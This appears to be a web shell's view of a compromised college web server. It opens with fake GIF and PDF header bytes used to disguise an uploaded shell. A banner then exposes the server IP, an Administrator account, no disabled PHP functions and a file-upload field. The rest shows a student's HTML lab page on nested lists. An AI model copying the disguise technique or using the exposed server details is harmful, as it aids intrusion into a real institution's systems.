GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1021/Labs/Lab10/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Lab 10 Lists - Gene Leppala</title> <meta charset="UTF-8"> <link href="Lab10.css" rel="stylesheet" type="text/css"> </head> <body> <h1>Lab 10 Lists - Gene Leppala</h1> <ol class="first-level"> <li>First Level <ol class="second-level"> <li>Second Level <ol class="third-level"> <li>Third Level <ol class="fourth-level"> <li>Fourth Level <ol class="fifth-level"> <li>Fifth Level</li> <li>Fifth Level line 2</li> <li>Fifth Level line 3</li> </ol> </li> <li>Fourth Level line 2</li> <li>Fourth Level line 3</li> </ol> </li> <li>Third Level line 2</li> <li>Third Level line 3</li> </ol> </li> <li>Second Level line 2</li> <li>Second Level line 3</li> </ol> </li> <li>First Level line 2</li> <li>First Level line 3</li> </ol> <ul class="level-one"> <li>Level One <ul class="level-two"> <li>Level Two <ul class="level-three"> <li>Level Three</li> <li>Level Three line 2</li> <li>Level Three line 3</li> </ul> </li> <li>Level Two line 2</li> <li>Level Two line 3</li> </ul> </li> <li>Level One line 2</li> <li>Level One line 3</li> </ul> <dl> <dt>HTML</dt> <dd>Hyper-Text Markup Language</dd> <dt>URL</dt> <dd>Uniform Resource Locator</dd> <dt>WWW</dt> <dd>World Wide Web</dd> </dl> </body> </html>